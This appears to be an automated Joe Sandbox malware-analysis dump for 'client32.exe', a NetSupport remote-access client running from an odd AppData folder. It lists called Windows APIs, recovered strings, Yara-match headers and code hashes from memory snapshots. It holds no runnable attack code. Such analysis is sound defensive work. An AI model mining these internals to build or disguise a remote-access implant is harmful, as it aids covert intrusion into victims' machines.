                                                                                  • Part of subcall function 110178F0: _GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 1101795C
                                                                                  • Part of subcall function 110178F0: CoUninitialize.COMBASE ref: 110179C0
                                                                                  • Part of subcall function 11017810: WaitForSingleObject.KERNEL32(0000033C,000000FF), ref: 11017842
                                                                                  • Part of subcall function 11017810: CoInitialize.OLE32(00000000), ref: 1101784B
                                                                                  • Part of subcall function 11017810: _GetRawWMIStringW@16.PCICL32(Win32_SystemEnclosure,00000001,?,?), ref: 11017872
                                                                                  • Part of subcall function 11017810: CoUninitialize.COMBASE ref: 110178D0
                                                                                • SetEvent.KERNEL32(0000033C), ref: 11017A0D
                                                                                • GetTickCount.KERNEL32 ref: 11017A13
                                                                                Strings
                                                                                • touchkbd, systype=%d, chassis=%d, took %d ms, xrefs: 11017A1D
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountInitializeObjectSingleStringTickUninitializeW@16Wait$Event
                                                                                • String ID: touchkbd, systype=%d, chassis=%d, took %d ms
                                                                                • API String ID: 3804766296-4122679463
                                                                                • Opcode ID: 610e40d61194c34f9e635cc577eb4e6ba02d92eb7ed74a53a25a0e307046be88
                                                                                • Instruction ID: 40d604bc36e6f054513ad574895ebf983a142e9fcea0f5d6417744b2b8156d0d
                                                                                • Opcode Fuzzy Hash: 610e40d61194c34f9e635cc577eb4e6ba02d92eb7ed74a53a25a0e307046be88
                                                                                • Instruction Fuzzy Hash: 74F0A0B6E8021C6FE700DBF99D89E6EB79CDB44318B100436E914C7201E9A2BC1187A1
                                                                                APIs
                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                • CreateThread.KERNEL32(00000000,00001000,Function_00138580,00000000,00000000,111396D2), ref: 1113877E
                                                                                • CloseHandle.KERNEL32(00000000,?,111396D2,AutoICFConfig,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 11138785
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseCreateHandleThread__wcstoi64
                                                                                • String ID: *AutoICFConfig$Client
                                                                                • API String ID: 3257255551-59951473
                                                                                • Opcode ID: 8ef9440ca52eb6c28e2eb8d9bc5eaacf11d3a77b41f44fd575e1b178a618d9bf
                                                                                • Instruction ID: 465e4da249eed1782d5a870e25bf0fc53578c4739eb9f60baa785aa5b16743b3
                                                                                • Opcode Fuzzy Hash: 8ef9440ca52eb6c28e2eb8d9bc5eaacf11d3a77b41f44fd575e1b178a618d9bf
                                                                                • Instruction Fuzzy Hash: 93E0D8397A0319BBF2108BE28D4BFA0FB5D9700766F100324FB34650C8E6A0B4408755
                                                                                APIs
                                                                                • Sleep.KERNEL32(000000FA), ref: 11070FE7
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 11070FF4
                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 110710C6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterLeaveSleep
                                                                                • String ID: Push
                                                                                • API String ID: 1566154052-4278761818
                                                                                • Opcode ID: 74813a05ea0db766d7d3990c23e63c1b548e25f4805cfc9f05432d5c18842b54
                                                                                • Instruction ID: 0680e92de3a1cb6b94a8841711a201229b8bffd134bed54c98ff914dc8d571b6
                                                                                • Opcode Fuzzy Hash: 74813a05ea0db766d7d3990c23e63c1b548e25f4805cfc9f05432d5c18842b54
                                                                                • Instruction Fuzzy Hash: 2A51CF75E04685DFE322CF64C884B96FBE2EF04314F058199E8A98B281D770BD44CB90
                                                                                APIs
                                                                                • WaitForSingleObject.KERNEL32(?,000001F4), ref: 11030DBC
                                                                                • CloseHandle.KERNEL32(?), ref: 11030DC9
                                                                                • FreeLibrary.KERNEL32(?), ref: 11030DD4
                                                                                • CloseHandle.KERNEL32(00000000), ref: 11030DDB
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseHandle$FreeLibraryObjectSingleWait
                                                                                • String ID:
                                                                                • API String ID: 1314093303-0
                                                                                • Opcode ID: aa088434d08b51544ea5abea5962b85dc1652b22456a7587c6afef069addc8bc
                                                                                • Instruction ID: 29ddb86f1ee71f4f843e45b5762510f7855215705a57359ad908d625b59217dc
                                                                                • Opcode Fuzzy Hash: aa088434d08b51544ea5abea5962b85dc1652b22456a7587c6afef069addc8bc
                                                                                • Instruction Fuzzy Hash: DEF08135E0521ACFDB14DFA5D998BADF774EF84319F0041A9D52A53680DF346540CB40
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(11029A9F,?,11144A43,?), ref: 111447FC
                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe,00000104,?,11144A43,?), ref: 11144819
                                                                                Strings
                                                                                • C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe, xrefs: 11144804, 11144812
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CurrentFileModuleNameProcess
                                                                                • String ID: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe
                                                                                • API String ID: 2251294070-680890208
                                                                                • Opcode ID: 4bd13d76f1b20cdb1905744e884daa295da0da760e6d1ff5c5a6e9fc06adbb17
                                                                                • Instruction ID: b68e03ccdc6c4a6a2c274322f8faab7020ac6906b57b96b3185223f9365e196b
                                                                                • Opcode Fuzzy Hash: 4bd13d76f1b20cdb1905744e884daa295da0da760e6d1ff5c5a6e9fc06adbb17
                                                                                • Instruction Fuzzy Hash: BE11CEB87803539BF704DFA5C9A4B19FBA4AB41B18F20883DE919D7E85EB71E444C780
                                                                                APIs
                                                                                • _malloc.LIBCMT ref: 11110239
                                                                                  • Part of subcall function 11163A11: __FF_MSGBANNER.LIBCMT ref: 11163A2A
                                                                                  • Part of subcall function 11163A11: __NMSG_WRITE.LIBCMT ref: 11163A31
                                                                                  • Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56
                                                                                • _memset.LIBCMT ref: 11110262
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateErrorExitHeapLastMessageProcess_malloc_memsetwsprintf
                                                                                • String ID: ..\ctl32\Refcount.cpp
                                                                                • API String ID: 2803934178-2363596943
                                                                                • Opcode ID: fdaee9942ff38bbfc9813524ff7dbe738d4946ee88f5f3b78065bcb716d44a09
                                                                                • Instruction ID: d1439471c86646bb150eb9b523f3ee6c48551de281bd1a8bb162c90cccd05cf0
                                                                                • Opcode Fuzzy Hash: fdaee9942ff38bbfc9813524ff7dbe738d4946ee88f5f3b78065bcb716d44a09
                                                                                • Instruction Fuzzy Hash: 68E0126AF8062533C511259A6C02FDFF75C8FD2AF9F040031FE0DBA251A596A95181E6
APIs
• CreateFileA.KERNEL32(\\.\NSWFPDrv,80000000,00000000,00000000,00000003,40000000,00000000,00000001,1102F66A,MiniDumpType,000000FF,00000000,00000000), ref: 11015597
• CloseHandle.KERNEL32(00000000,?,?,?,View,Client,Bridge), ref: 110155A8
Strings
Yara matches
Similarity
• API ID: CloseCreateFileHandle
• String ID: \\.\NSWFPDrv
• API String ID: 3498533004-85019792
• Opcode ID: d572e8544444f97a5f3fc22a419c76dea4a94a774e22dfe6340fcb1249187ee5
• Instruction ID: 8ee41b20f4352974833a803ddfcebdd3f772c34de5b97fa52423d1e1393adc22
• Opcode Fuzzy Hash: d572e8544444f97a5f3fc22a419c76dea4a94a774e22dfe6340fcb1249187ee5
• Instruction Fuzzy Hash: 51D09271A410386AF27055A6AD48F87AD099B026B5F220260B939E658486104D4186E0
APIs
Yara matches
Similarity
• API ID: _calloc
• String ID:
• API String ID: 1679841372-0
• Opcode ID: 918923e0a1279dfc537c19a69b58c34981e358f5fb15b3a273ee7d5d1eaccc98
• Instruction ID: 23015313aa3c4790eb0b31f5809972b43774ae16244dcdf9e0384501427d1f2b
• Opcode Fuzzy Hash: 918923e0a1279dfc537c19a69b58c34981e358f5fb15b3a273ee7d5d1eaccc98
• Instruction Fuzzy Hash: 7F519F3560021AAFDB90CF58CC80F9ABBB9FF89744F108559E929DB344D770EA11CB90
APIs
• GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1111216A
• __wsplitpath.LIBCMT ref: 11112185
  • Part of subcall function 11169F04: __splitpath_helper.LIBCMT ref: 11169F46
• GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 111121B9
Yara matches
Similarity
• API ID: DirectoryInformationSystemVolume__splitpath_helper__wsplitpath
• String ID:
• API String ID: 1847508633-0
• Opcode ID: 71199244ed6d33bf939596fd6a1d73962180ede2ad43d5891037c90b598f2531
• Instruction ID: c591a5ba9c17bf4ee1841d59d592da31fd18a085fce33aa04bf57df4da238aa2
• Opcode Fuzzy Hash: 71199244ed6d33bf939596fd6a1d73962180ede2ad43d5891037c90b598f2531
• Instruction Fuzzy Hash: E4116175A4020CABEB14DF94CD42FE9F778AB48B04F5041D8E6246B1C0E7B02A48CBA5
APIs
• GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110F8244,00000001,11142328,_debug,TraceCopyData,00000000,00000000,?,?,00000000,?), ref: 1109EE21
• OpenProcessToken.ADVAPI32(00000000,?,?,110F8244,00000001,11142328,_debug,TraceCopyData,00000000,00000000,?,?,00000000,?), ref: 1109EE28
  • Part of subcall function 1109ED30: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,11030346,?,00000000), ref: 1109ED68
  • Part of subcall function 1109ED30: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109ED84
  • Part of subcall function 1109ED30: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00F9F4D8,00F9F4D8,00F9F4D8,00F9F4D8,00F9F4D8,00F9F4D8,00F9F4D8,111EFB64,?,00000001,00000001), ref: 1109EDB0
  • Part of subcall function 1109ED30: EqualSid.ADVAPI32(?,00F9F4D8,?,00000001,00000001), ref: 1109EDC3
• CloseHandle.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 1109EE47
Yara matches
Similarity
• API ID: Token$InformationProcess$AllocateCloseCurrentEqualHandleInitializeOpen
• String ID:
• API String ID: 2256153495-0
• Opcode ID: 641b9455226f1aac1b911a8e8f52627aef12e30cb8b5c51eee988bc63af2e0a2
• Instruction ID: 92f2080e931b07f8e3ae21524f42d2d018667502f077eef341ad82fca5e9a749
• Opcode Fuzzy Hash: 641b9455226f1aac1b911a8e8f52627aef12e30cb8b5c51eee988bc63af2e0a2
• Instruction Fuzzy Hash: C8F05E74A01328EFDB08CFE5D99482EB7B8AF08748B40487DE429C3208D632DE00DF50
APIs
• InitializeCriticalSection.KERNEL32(111F1908,1B702977,?,?,?,?,-00000001,1118B2A8,000000FF,?,11110508,00000001,?,1116A543,?), ref: 11110464
• EnterCriticalSection.KERNEL32(111F1908,1B702977,?,?,?,?,-00000001,1118B2A8,000000FF,?,11110508,00000001,?,1116A543,?), ref: 11110480
• LeaveCriticalSection.KERNEL32(111F1908,?,?,?,?,-00000001,1118B2A8,000000FF,?,11110508,00000001,?,1116A543,?), ref: 111104C8
Yara matches
Similarity
• API ID: CriticalSection$EnterInitializeLeave
• String ID:
• API String ID: 3991485460-0
• Opcode ID: 503ed64456695a8aee9ef8790988804961b831d33d68d065787b6580b68da22d
• Instruction ID: 9bba9b476bfc0c868cb30dd48e950e81aed48164d9983b9afed5b510859fa25d
• Opcode Fuzzy Hash: 503ed64456695a8aee9ef8790988804961b831d33d68d065787b6580b68da22d
• Instruction Fuzzy Hash: A8118671B4061AAFE7008FA6CDC4B9AF7A8FB4A755F404239E815A7B44E7355804CBE0
APIs
• LoadLibraryA.KERNEL32(00000000,00000000), ref: 11069542
Strings
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID: ??CTL32.DLL
                                                                                • API String ID: 1029625771-2984404022
                                                                                APIs
                                                                                • GetDriveTypeA.KERNEL32(?), ref: 110271CD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: DriveType
                                                                                • String ID: ?:\
                                                                                • API String ID: 338552980-2533537817
                                                                                APIs
                                                                                  • Part of subcall function 110ED4E0: RegCloseKey.KERNEL32(?,?,?,110ED52D,?,00000000,00000001,?,11030BFF,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED4ED
                                                                                • RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?,?,00000000,00000001,?,11030BFF,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED53C
                                                                                  • Part of subcall function 110ED2B0: wvsprintfA.USER32(?,00020019,?), ref: 110ED2DB
                                                                                Strings
                                                                                • Error %d Opening regkey %s, xrefs: 110ED54A
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseOpenwvsprintf
                                                                                • String ID: Error %d Opening regkey %s
                                                                                • API String ID: 1772833024-3994271378
                                                                                APIs
                                                                                • RegCloseKey.KERNEL32(?,?,?,110ED52D,?,00000000,00000001,?,11030BFF,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED4ED
                                                                                  • Part of subcall function 110ED2B0: wvsprintfA.USER32(?,00020019,?), ref: 110ED2DB
                                                                                Strings
                                                                                • Error %d closing regkey %x, xrefs: 110ED4FD
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Closewvsprintf
                                                                                • String ID: Error %d closing regkey %x
                                                                                • API String ID: 843752472-892920262
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(NSMTRACE,?,1102E424,11026BE0,012FB850,?,?,?,00000100,?,?,00000009), ref: 11146FF9
                                                                                  • Part of subcall function 11146270: GetModuleHandleA.KERNEL32(NSMTRACE,11195AD8), ref: 1114628A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: HandleLibraryLoadModule
                                                                                • String ID: NSMTRACE
                                                                                • API String ID: 4133054770-4175627554
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(psapi.dll,?,11030964), ref: 110262C8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID: psapi.dll
                                                                                • API String ID: 1029625771-80456845
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(nslsp.dll,00000000,1102F63D,MiniDumpType,000000FF,00000000,00000000,?,?,?,View,Client,Bridge), ref: 1101553E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID: nslsp.dll
                                                                                • API String ID: 1029625771-3933918195
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 110750EF
                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,?,00000000,0000000B,?), ref: 11075159
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FreeLibrary_memset
                                                                                • String ID:
                                                                                • API String ID: 1654520187-0
                                                                                • Opcode ID: 4e56bc08cf6d4b85bc31047bf59587d3794f3c6155dff5afacd053865e97b66c
                                                                                • Instruction ID: 75615663fc9b5e204bff5cdf828812fccbd9a8c0715bb2e01743ee940980502e
                                                                                • Opcode Fuzzy Hash: 4e56bc08cf6d4b85bc31047bf59587d3794f3c6155dff5afacd053865e97b66c
                                                                                • Instruction Fuzzy Hash: 28219276E01268A7D710DE95EC41BEFBBBCFB44315F4041AAE90997200EB729A50CBE1
APIs
  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
• std::exception::exception.LIBCMT ref: 110608C3
• __CxxThrowException@8.LIBCMT ref: 110608D8
Memory Dump Source
• Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
• String ID:
• API String ID: 1338273076-0
• Opcode ID: 7a405ee56f1315c6ee1f340a3ff28517fdd231231b98c8aaa449bf634c5199d4
• Instruction ID: 40c1b550870c83f0c669b419c7937a1de5292af9ae005a9ffb354a33ebb971cd
• Opcode Fuzzy Hash: 7a405ee56f1315c6ee1f340a3ff28517fdd231231b98c8aaa449bf634c5199d4
• Instruction Fuzzy Hash: F11181BA900609AFC715CF99C840ADAF7F8FB58614F10863EE91997740E774E904CBE1
APIs
Memory Dump Source
• Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: _malloc_memmove
• String ID:
• API String ID: 1183979061-0
• Opcode ID: 5b978a5cc2cdba63a64411b19136718d8af37a4e7f400d0beed470777af2abcc
• Instruction ID: e8b2e2ab67b960fffb59418ca6d045486158c88f9a02fc8ea8f4f968a4d4dde1
• Opcode Fuzzy Hash: 5b978a5cc2cdba63a64411b19136718d8af37a4e7f400d0beed470777af2abcc
• Instruction Fuzzy Hash: A3F02879A002566F8701CF2C9844897FBDCEF4A25831480A6E849CB302D671EC15C7F0
APIs
• _memset.LIBCMT ref: 110886DF
• InitializeCriticalSection.KERNEL32(0000E3D0,00000000,?,11070CC3,00000000,00000000,11182F3E,000000FF), ref: 11088750
Memory Dump Source
• Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: CriticalInitializeSection_memset
• String ID:
• API String ID: 453477542-0
• Opcode ID: b70e1f074512ce2ced997d39b2297f4199a589ff9b013c872d54b649f42912e3
• Instruction ID: 67e0870afe33de0d146d23e59662f9f8cfec19dbcaf4764f519a7c8a3238bf1f
• Opcode Fuzzy Hash: b70e1f074512ce2ced997d39b2297f4199a589ff9b013c872d54b649f42912e3
• Instruction Fuzzy Hash: CC1157B1901B148FC3A4CF7A99816C3FAE5BB58354F90892E95EEC2600DB756564CF90
APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11145031
• ExtractIconExA.SHELL32(?,00000000,000F02E5,000C0309,00000001), ref: 11145068
Memory Dump Source
• Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: ExtractFileIconModuleName
• String ID:
• API String ID: 3911389742-0
• Opcode ID: 6ebcb2ed19ff45d4e03ce3bb4affc9ea6a4a037fcd6ce03922cabf34851b5b2f
• Instruction ID: 51784f3a6cc6e5149e616e04a2eb2c6e0d372b09ba8f06c96ffc5d3ba3765e1d
• Opcode Fuzzy Hash: 6ebcb2ed19ff45d4e03ce3bb4affc9ea6a4a037fcd6ce03922cabf34851b5b2f
• Instruction Fuzzy Hash: F5F0BB79A4411C5FE718DFA0CC51FF9B36AE784709F444269E956D61C4CE70594CC741
APIs
  • Part of subcall function 1116A1AF: __getptd_noexit.LIBCMT ref: 1116A1AF
• __lock_file.LIBCMT ref: 11164CBE
  • Part of subcall function 1116BE59: __lock.LIBCMT ref: 1116BE7E
• __fclose_nolock.LIBCMT ref: 11164CC9
Memory Dump Source
• Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: __fclose_nolock__getptd_noexit__lock__lock_file
• String ID:
• API String ID: 2800547568-0
• Opcode ID: 271288d31555c81154ec7293090fb485e1e9931888df87aecff959c56407cd41
